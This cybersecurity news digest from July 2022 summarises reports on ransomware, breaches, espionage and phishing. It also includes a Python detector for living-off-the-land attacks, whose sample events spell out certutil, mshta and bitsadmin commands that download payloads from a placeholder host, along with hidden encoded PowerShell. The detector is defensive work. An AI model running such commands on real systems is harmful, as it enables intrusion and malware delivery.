Saturday, July 23, 2022 // (IG): BB // Weekly Sponsor: The Fintel Brief
FBI investigation determined Chinese-made Huawei equipment could disrupt US nuclear arsenal communications
FROM THE MEDIA: On paper, it looked like a fantastic deal. In 2017, the Chinese government was offering to spend $100 million to build an ornate Chinese garden at the National Arboretum in Washington DC. Complete with temples, pavilions and a 70-foot white pagoda, the project thrilled local officials, who hoped it would attract thousands of tourists every year. But when US counterintelligence officials began digging into the details, they found numerous red flags. The pagoda, they noted, would have been strategically placed on one of the highest points in Washington DC, just two miles from the US Capitol, a perfect spot for signals intelligence collection, multiple sources familiar with the episode told CNN.
READ THE STORY: CNN
Cyber-attacks on Port of Los Angeles have doubled since pandemic
FROM THE MEDIA: The number of monthly attacks targeting the Port of Los Angeles is now around 40 million, the port's executive director Gene Seroka told the BBC. Los Angeles is the busiest port in the western hemisphere, handling more than $250bn (£210bn) of cargo every year. The threats are believed to come mainly from Europe and Russia, and aim to disrupt the US economy, Mr Seroka said. "Our intelligence shows the threats are coming from Russia and parts of Europe. We have to stay steps ahead of those who want to hurt international commerce," he told the BBC's World Service.
READ THE STORY: BBC
Growing Cannabis Industry a Prime Target for Cyberattacks
FROM THE MEDIA: Cannabis is becoming a flashpoint for investment as the U.S. stands on the brink of legalization. Ohio alone is set to open dozens of new medical dispensaries in the coming months, thanks to the release in May of 70 new provisional licenses by state regulators. “Pay us one million dollars, or your plants die.” It sounds like something out of a low-rate, slapstick thriller. However, cybersecurity is no joke. Just look at the continuing fallout from the SolarWinds attack, or the aftermath of the Colonial Pipeline attack during May 2021. And don't forget what happened in June 2021, when hackers crippled operations of the world's largest meat processing company.
READ THE STORY: Crains Cleveland
How Conti ransomware hacked and encrypted the Costa Rican government
FROM THE MEDIA: Details have emerged on how the Conti ransomware gang breached the Costa Rican government, showing the attack's precision and the speed of moving from initial access to the final stage of encrypting devices. This is the last attack from the Conti ransomware operation before the group transitioned to a different form of organization that relies on multiple cells working with other gangs. The Conti ransomware operation launched in 2020 to replace Ryuk and quickly grew to infamy after attacking victims in both the private and the public sector, including local governments in the U.S., schools, and national healthcare systems.
READ THE STORY: BleepingComputer
The 2022 US Midterm Elections’ Top Security Issue: Death Threats
FROM THE MEDIA: In the lead-up to the 2018 midterm elections in the United States, law enforcement, intelligence, and election officials were on high alert for digital attacks and influence operations after Russia demonstrated the reality of these threats by targeting the 2016 presidential election. Six years later, the threat of hacking and malign foreign influence remains, but 2022 is a different time and a new top-line risk has emerged: physical safety threats to election officials, their families, and their workplaces.
READ THE STORY: Wired
Hacker selling Twitter account data of 5.4 million users for $30k
FROM THE MEDIA: Twitter has suffered a data breach after threat actors used a vulnerability to build a database of phone numbers and email addresses belonging to 5.4 million accounts, with the data now up for sale on a hacker forum for $30,000. Yesterday, a threat actor known as ‘devil’ said on a stolen data market that the database contains info about various accounts, including celebrities, companies, and random users.
READ THE STORY: BleepingComputer
Malware aimed at industrial engineers discovered
FROM THE MEDIA: There’s no shortage of tools offered on the internet to help people solve problems. But some are really malware. According to researchers at Dragos, one is password cracking software for programmable logic controllers (PLCs), Human-Machine Interface (HMI) applications, and project files, which is offered on multiple social media sites. In some cases it will retrieve a password, the researchers said in a blog this week — but only if the PLC application has a vulnerability that can be exploited. Meanwhile, in the background, the tool is installing a malware dropper, infecting the machine with the Sality malware and turning the host into a peer in Sality’s peer-to-peer botnet.
READ THE STORY: ITworld Canada
‘Cyber-mercenaries’ sought by new cybercrime operation
FROM THE MEDIA: Threatpost reports that the new for-hire cybercrime operation Atlas Intelligence Group, also known as Atlantis Cyber-Army, has been enlisting the services of "cyber-mercenaries" or independent unethical hackers to conduct specific aspects of attacks targeted at government assets in the U.S. and other parts of the world since its emergence in May. Several services including distributed denial-of-service attacks, remote desktop protocol hijacking, data leaks, and network penetration services are being offered by A.I.G., which is being led by Mr. Eagle, who also promotes the services, according to a report from Cyberint.
READ THE STORY: SCMAG
Hacked Ukrainian Radio Stations Broadcast Fake News About President Zelensky’s Health
FROM THE MEDIA: Ukrainian radio stations were hacked this week by threat actors to spread fake news about President Volodymyr Zelensky's health, according to Ukraine's security officials. A music program on "at least one" of TAVR Media's stations, one of Ukraine's largest radio networks, was interrupted by the false reports just after midday on July 21. The so-far unidentified hackers broadcast reports that Zelensky was hospitalized "in an intensive care ward" and that he had temporarily delegated his presidential responsibilities to Ruslan Stefanchuk, Chairman of the Ukrainian parliament.
READ THE STORY: InfoSecMag
Conti's fate and effects
FROM THE MEDIA: In the course of a discussion with Advanced Intelligence over the firm's study of Conti's attack against Costa Rican networks, BleepingComputer offers a useful summary of what's happened to the gang. It's effectively rebranded through dispersal, its alumni now working for the Quantum, Hive, AvosLocker, BlackCat, and Hello Kitty gangs. Security Boulevard calls these "splinter RaaS [ransomware-as-a-service] groups."
READ THE STORY: CyberWire
Espionage and counterespionage during the hybrid war
FROM THE MEDIA: Traditional espionage run by intelligence officers working under diplomatic cover has grown somewhat more difficult for Russia during the present war. The Record quotes the head of Britain's MI6 as estimating that around half, roughly four hundred in total, of the Russian intelligence officers so operating in Europe have been expelled. Clearing compromised personnel from Ukrainian security and intelligence services is a more complex and difficult task. The Atlantic Council describes the challenges of expunging Russian sympathizers from the SBU security service and the Prosecutor General’s Office (PGO). The heads of both agencies have been suspended, but reforming large agencies in wartime is like rebuilding a ship during a voyage.
READ THE STORY: CyberWire
Snowballing Ransomware Variants Highlight Growing Threat to VMware ESXi Environments
FROM THE MEDIA: The latest confirmations of the growing attacker interest in VMware ESXi environments are two ransomware variants that surfaced in recent weeks and have begun hitting targets worldwide. One of the malware tools, dubbed Luna, is written in Rust and can encrypt data on ESXi virtual machines (VMs) in addition to data on Linux and Windows systems. The other is Black Basta, a rapidly proliferating ransomware variant written in C++ that, like Luna, targets ESXi VMs and also runs on Windows and Linux systems.
READ THE STORY: DarkReading
Malware: On sale for the price of a pint on dark web
FROM THE MEDIA: The dark web has made cyber crime accessible even to those with only “rudimentary” IT skills, with malware available to buy for less than $10, around £8.50, a new report by forensic experts Forensic Pathways and security platform HP Wolf Security has found. The dark web – a group of websites only accessible via special routing software, usually Tor – gives cyber criminals “an anonymous online environment” where they “can collaborate, organise, hone their skills and establish illicit shops”, the report says.
READ THE STORY: NewStatesMan
LinkedIn most impersonated brand in phishing attacks
FROM THE MEDIA: Workplace social network LinkedIn has emerged as the brand most imitated by cyber criminals in their phishing attacks for the second quarter in a row, accounting for 45% of all phishing attacks in the three-month period to the end of June 2022, according to a Check Point Research report. In its Brand phishing report for Q2 2022, Check Point’s threat research arm highlights how social networks in general are the most imitated brand category, followed by technology companies and then shipping. The past three months saw a “striking rise” in big name technology companies being exploited, with Microsoft now making up 13% of all brand phishing attempts to place second, edging out DHL, which accounted for 12% of brand phishing emails.
READ THE STORY: ComputerWeekly
Malware Attacks In Ukraine Continue
FROM THE MEDIA: Hacked radio stations made to broadcast disinformation and unique malware targeted at a tech company whose software is used by state agencies are just the latest examples of the barrage of malware facing Ukrainian network defenders. It's not quite cyberwar, but as the Russian incursion into Ukraine grinds onward, so does the barrage of malware attacks in Ukrainian cyberspace. The second quarter of this year saw a "significant ramp up" of malware intended to steal and destroy data, says the State Service of Special Communications and Information Protection of Ukraine. It estimates malware incidents are up by 38% compared with the first three months of the year.
READ THE STORY: BankInfoSec
Cheap malware kits put channel under pressure
FROM THE MEDIA: The channel knows it's often seen as the vital provider of cyber defenses by customers, but the idea that malware can be purchased for the price of a pint is a sobering thought that shows the ease with which threats can be shared around the dark web. HP is alerting the channel to the findings of its report, The evolution of cybercrime: Why the dark web is supercharging the threat landscape and how to fight back. The main revelation was the extent to which malware was being spread through "plug-and-play" kits that often cost very little.
READ THE STORY: MicroScope
Google blocks website of largest computing society over malware claims
FROM THE MEDIA: Google Search and Drive erroneously mark links to research papers and websites of the Association for Computing Machinery (ACM) as malware. Google Search results for the ACM website, ACM Digital Library research papers, and contact pages mark links to ACM domains as malicious, which means clicking on one of the acm.org, dl.acm.org or libraries.acm.org links leads to an "interstitial" hosted on Google's redirect page that warns users of malicious activity associated with the identified site. The problem is blocking all traffic to ACM domains from Google Search results. To work around the issue, ACM visitors must manually copy and paste the intended link into the address bar of their web browser.
READ THE STORY: ITworld Canada
US Defense Contractor L3Harris Drops Plan To Buy NSO Group Despite Allegedly Having The Defense Department’s Backing
FROM THE MEDIA: A couple of weeks ago, news leaked of a match made in hell: the acquisition of toxic asset/exploit developer NSO Group by defense contractor L3Harris. The “Harris” part of the contractor’s name refers to none other than Harris Corporation, the manufacturer of Stingray cell tower spoofers and an entity that often found itself described as “controversial” or “embattled.” Good news, everyone! The wedding is off, according to this report from Ellen Nakashima for the Washington Post.
READ THE STORY: TechDirt
Google Chrome Zero-Day Weaponized to Spy on Journalists
FROM THE MEDIA: A zero-day vulnerability in Google Chrome was used by the established spyware group Candiru to compromise users in the Middle East — specifically journalists in Lebanon. Avast researchers said attackers compromised a website used by news agency employees in Lebanon, and injected code. That code identified specific, targeted users and routed them to an exploit server. From there, the attackers collect a set of about 50 data points, including language, device type, time zone, and much more, to verify that they have the intended target.
READ THE STORY: DarkReading
‘Living Off the Cloud’: Hackers Modernize an Old-School Tactic
FROM THE MEDIA: An old threat is new again — or never really went away.
As governments and other players increasingly turn to the cloud, malicious actors are following, adding “living off the cloud” attacks back into their repertoires.
Living off the land ploys see hackers use phishing or other methods to gain access to victims' networks, then use the victims' own tools and services for malicious purposes. These attacks are particularly subtle and date back to at least 2013, according to cybersecurity firm Darktrace.
READ THE STORY: GOVTECH
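As an added illustration of the living-off-the-land pattern described in the story above (example code written for this digest, not from the GovTech article or from Darktrace): a small detector that runs a handful of LOLBin rules over Sysmon-style process-creation events. The event records, host names, users and the 203.0.113.7 address are constructed; the rules cover well-known abuse of built-in Windows binaries (certutil -urlcache downloads, mshta and bitsadmin fetching remote content, encoded PowerShell, rundll32 invoking a script engine) and escalate severity when the parent process is an Office application. Plain rundll32 use of a system DLL and a PowerShell script run by file path are included so the rules can be seen not to fire on them.

```python
import re
from dataclasses import dataclass

# Constructed Sysmon Event ID 1 style records, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws-12", "user": "jdoe", "parent": "outlook.exe",
     "cmd": 'certutil.exe -urlcache -split -f http://203.0.113.7/upd.bin C:\\Users\\jdoe\\AppData\\Local\\Temp\\upd.bin'},
    {"host": "ws-12", "user": "jdoe", "parent": "explorer.exe",
     "cmd": 'powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA'},
    {"host": "srv-01", "user": "svc_backup", "parent": "services.exe",
     "cmd": 'rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL'},
    {"host": "ws-12", "user": "jdoe", "parent": "winword.exe",
     "cmd": 'mshta.exe http://203.0.113.7/launch.hta'},
    {"host": "srv-01", "user": "svc_backup", "parent": "cmd.exe",
     "cmd": 'bitsadmin.exe /transfer job /download /priority high http://203.0.113.7/a.exe C:\\ProgramData\\a.exe'},
    {"host": "ws-30", "user": "admin", "parent": "explorer.exe",
     "cmd": 'powershell.exe -File C:\\scripts\\inventory.ps1'},
]

# A LOLBin spawned directly by an Office application usually means a weaponised document.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


@dataclass(frozen=True)
class Rule:
    name: str
    image: str        # executable basename the rule applies to
    patterns: tuple   # every regex must match the argument string
    severity: str = "medium"


RULES = (
    Rule("certutil_remote_download", "certutil.exe", (r"(?i)-urlcache", r"(?i)https?://"), "high"),
    Rule("mshta_remote_script", "mshta.exe", (r"(?i)https?://",), "high"),
    Rule("bitsadmin_transfer", "bitsadmin.exe", (r"(?i)/transfer", r"(?i)https?://"), "high"),
    Rule("powershell_encoded", "powershell.exe", (r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\b",), "medium"),
    Rule("rundll32_script_engine", "rundll32.exe", (r"(?i)(javascript|vbscript):",), "high"),
)


def split_command(cmd):
    """Return (lower-cased image basename, argument string) for a command line.

    Handles a quoted image path ("C:\\Windows\\System32\\mshta.exe" ...) as well as a bare one.
    """
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        image, args = cmd[1:end], cmd[end + 1:]
    else:
        image, _, args = cmd.partition(" ")
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return basename, args.strip()


def evaluate(event):
    """Apply every rule to one event; return the list of alerts it produces."""
    image, args = split_command(event["cmd"])
    hits = []
    for rule in RULES:
        if rule.image != image:
            continue
        if all(re.search(p, args) for p in rule.patterns):
            severity = rule.severity
            if event.get("parent", "").lower() in OFFICE_PARENTS:
                severity = "critical"
            hits.append({"host": event["host"], "user": event["user"],
                         "rule": rule.name, "severity": severity})
    return hits


def hunt(events):
    """Run the rule set over a batch of events and return all alerts in event order."""
    alerts = []
    for ev in events:
        alerts.extend(evaluate(ev))
    return alerts


if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(f"[{a['severity']:8}] {a['host']} {a['user']} {a['rule']}")
```

Matching on the image basename rather than the full path keeps the rules working when the binary is copied or renamed into another directory but keeps its name; a renamed binary needs the original file name or hash from the event, which Sysmon also records and which this example does not use.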
Hackers hiding malicious links in top Google search results, researchers warn
FROM THE MEDIA: Google users have been warned of a new malvertising campaign in which people searching for popular websites are instead redirected to scam sites by malicious adverts. Searches for some of the most popular websites were found to produce adverts that had been crafted to appear as if they were legitimate links to the desired website, with some appearing as the first listing on a results page. Websites mimicked by the threat actors include YouTube, Amazon, Facebook and Walmart, and in all cases appear to lead to a browser locker website where users are given scam warnings to call Microsoft support, or fake alerts from Windows Defender, according to researchers at Malwarebytes.
READ THE STORY: TechCentral
The Cybersecurity Dark Threat Facing Universities
FROM THE MEDIA: A peek at Microsoft’s Global Threat Activity tool may surprise you. In the past 30 days, the Education sector has reported more malware encounters than any other industry. With nearly 6 million threats in Education alone, the Retail and Consumer Goods sector is a distant second with under 640,000 incidents. Universities and colleges are easy targets. As early adopters of computers and the internet, many Higher Ed institutions still maintain legacy computers and infrastructure that limit the implementation of adequate cybersecurity.
READ THE STORY: SecurityBoulevard
China’s attempts to control citizen data risk exposure
FROM THE MEDIA: China is currently dealing with what might be the largest data breach in the country’s history, despite the fact that lawmakers have built one of the world’s tightest cybersecurity and data-protection systems. The Wall Street Journal explores how the government’s extensive surveillance network has made it a target for data theft. According to database tracking service LeakIX, China has tens of thousands of unprotected databases exposed on the internet totaling more than 700 terabytes of data, the largest volume of exposed data of any country. What’s more, the data are especially sensitive in nature, largely due to the way China aggregates data from multiple sources in its state-run surveillance platforms.
READ THE STORY: CyberWire
Google Chrome security update fixes 'high risk' flaws
FROM THE MEDIA: Google has released security updates for Google Chrome browser for Windows, Mac and Linux, addressing vulnerabilities that could allow a remote attacker to take control of systems. There are 11 fixes in total, including five that are classed as high-severity. As a result, CISA has issued an alert encouraging IT administrators and regular users to install the updates as soon as possible to ensure their systems are not vulnerable to the flaws.
READ THE STORY: ZDNET
Thai Minister Says Spyware Used for National Security, Drug Dealers
FROM THE MEDIA: A Thai minister has acknowledged the use of surveillance software to track those involved in “national security or drug matters,” but stated that it was only used in “limited and special cases.” Chaiwut Thanakamanusorn, Minister of Digital Economy and Society, told parliament on Tuesday that he was aware of the use of spyware but did not disclose which software was used and against whom.
READ THE STORY: Epoch Times
A small Canadian town is being extorted by a global ransomware gang
FROM THE MEDIA: The Canadian town of St. Marys, Ontario, has been hit by a ransomware attack that has locked staff out of internal systems and encrypted data. The small town of around 7,500 residents seems to be the latest target of the notorious LockBit ransomware group. On July 22nd, a post on LockBit’s dark web site listed townofstmarys.com as a victim of the ransomware and previewed files that had been stolen and encrypted.
READ THE STORY: Theverge
U.S. Seizes Crypto Funds from North Korean Ransomware Attack
FROM THE MEDIA: U.S. authorities seized approximately half a million dollars worth of cryptocurrency from North Korean hackers that targeted healthcare providers, according to a Department of Justice announcement on Tuesday. U.S. officials have attributed two healthcare facility ransomware attacks to North Korean hackers. The hackers used a new strain of ransomware, known as 'Maui', to encrypt the files and servers of a medical center in Kansas in 2021, locking users out of the system until the ransom was paid. The hospital paid the hackers $100,000 worth of bitcoin to regain access to their servers.
READ THE STORY: OCCRP
Items of interest
The Beginner’s Guide to Attack Paths
FROM THE MEDIA: According to Gartner, worldwide security and risk management spend will reach $150 billion in 2021. In another report by Cybersecurity Ventures, cybersecurity spend could reach as high as $1.75 trillion. With all the tools and increased security spend, one would expect that security teams feel confident and secure in protecting their assets. Yet today’s security teams are overwhelmed with the volume of alerts, struggling with siloed security findings, and finding it near impossible to determine which findings are critical and require immediate remediation and which ones don’t.
Could today’s security teams be going about security all wrong?
The future of protecting multi-cloud environments with a variety of layers and with a whole host of attack vectors means that a future solution must also be multi-faceted. It should be contextual and relate findings across multiple layers. It should be intuitive and able to prioritize findings while also surfacing them in a visual way. It should be sophisticated in nature by anticipating the moves of a hacker rather than simply rehashing existing vulnerabilities.
READ THE STORY: SecurityBoulevard
TryHackMe Review (Video)
FROM THE MEDIA: In this video we review TryHackMe.
0day Shares His Journey on Becoming #1 on TryHackMe (Video)
FROM THE MEDIA: Ryan AKA 0day is currently the #1 hacker on TryHackMe's platform. In this episode of Live Recon, 0day talks about his experience, what it takes to stay at the top of the TryHackMe leaderboard, resources to learn, and more!
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com